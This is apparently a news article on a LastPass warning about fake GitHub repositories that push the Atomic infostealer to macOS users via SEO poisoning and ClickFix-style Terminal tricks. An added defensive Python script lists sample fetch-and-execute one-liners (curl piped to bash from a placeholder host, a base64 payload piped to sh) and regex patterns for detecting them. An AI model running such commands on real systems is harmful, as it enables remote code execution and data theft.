LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer

LastPass has issued a warning about a widespread information-stealing campaign targeting macOS users through fake GitHub repositories. These repositories host malware-infused programs disguised as legitimate tools.

According to Alex Cox, Mike Kosak, and Stephanie Schneider from the LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team, the fraudulent repositories specifically redirect victims to download the Atomic infostealer malware.

The campaign doesn’t only impersonate LastPass. Other well-known tools being spoofed include 1Password, Basecamp, Dropbox, Gemini, Hootsuite, Notion, Obsidian, Robinhood, Salesloft, SentinelOne, Shopify, Thunderbird, and TweetDeck. All of these fake GitHub repositories are tailored to target macOS systems.

Attackers are using SEO poisoning to push malicious GitHub links to the top of search results on Google and Bing. Unsuspecting users searching for these tools are prompted to click an “Install on MacBook” button, which redirects them to the malicious GitHub domain.

To evade takedowns, the attackers appear to create GitHub pages under multiple usernames, LastPass noted. Once on the page, victims are guided to another domain hosting ClickFix-style instructions, which trick users into copying and running commands in the macOS Terminal. This leads to the installation of the Atomic Stealer malware.
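As an added example (not code from LastPass or from this article), the script below triages a zsh history file for the traits of the ClickFix-style Terminal one-liners described above: a remote script piped straight into a shell, a remote script pulled in through command substitution, a base64-decoded payload piped into a shell, or AppleScript invoking a shell. The history entries and the placeholder.invalid host are constructed for illustration; the rule names are this example's own.

```python
import re
from dataclasses import dataclass

# Constructed sample in zsh extended-history format (": <epoch>:<duration>;<command>").
# Illustrative entries only; these are not commands observed in the campaign.
SAMPLE_HISTORY = """\
: 1726000001:0;brew install wget
: 1726000002:0;git clone https://placeholder.invalid/example-tool.git
: 1726000003:0;curl -fsSL https://placeholder.invalid/install.sh | bash
: 1726000004:0;/bin/bash -c "$(curl -fsSL https://placeholder.invalid/setup.sh)"
: 1726000005:0;echo aGVsbG8= | base64 -d | sh
: 1726000006:0;osascript -e 'do shell script "echo hi"'
: 1726000007:0;ls -la ~/Library/LaunchAgents
"""

# Each rule captures one ClickFix-style trait; benign installers can match too,
# so the output is a triage list for an analyst, not a verdict.
RULES = [
    ("remote-script-piped-to-shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")),
    ("remote-script-via-command-substitution",
     re.compile(r"\b(ba|z)?sh\s+-c\s+[\"']?\$\(\s*(curl|wget)\b")),
    ("decoded-payload-piped-to-shell",
     re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b")),
    ("applescript-shell-execution", re.compile(r"osascript\b.*do shell script")),
]

@dataclass
class Finding:
    timestamp: int
    command: str
    rule: str

def parse_zsh_history(text):
    """Yield (epoch, command) pairs; lines without the extended prefix get epoch 0."""
    for line in text.splitlines():
        m = re.match(r"^: (\d+):\d+;(.*)$", line)
        if m:
            yield int(m.group(1)), m.group(2)
        elif line.strip():
            yield 0, line

def find_clickfix_candidates(history_text):
    """Return one Finding per entry that matches any rule (first matching rule wins)."""
    findings = []
    for ts, cmd in parse_zsh_history(history_text):
        for name, pattern in RULES:
            if pattern.search(cmd):
                findings.append(Finding(ts, cmd, name))
                break
    return findings

if __name__ == "__main__":
    for f in find_clickfix_candidates(SAMPLE_HISTORY):
        print(f"{f.timestamp}\t{f.rule}\t{f.command}")
```

Run it against a real `~/.zsh_history` (or a bash history, which the parser accepts as plain lines) and review each hit by hand, since legitimate installers use the same shapes.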

Similar techniques have been seen before. For example, malicious Google Ads promoting Homebrew previously directed users to a fake GitHub repository delivering a multi-stage dropper. This malware could detect virtual machines or analysis tools, decode and run system commands, and establish connections with remote servers, according to security researcher Dhiraj Mishra.

In recent weeks, attackers have also been observed abusing public GitHub repositories to distribute malware via Amadey, and even using dangling commits in legitimate repositories to mislead users into downloading malicious programs.

Author: shadjavist

Humble gentleman who never believes in impossibility
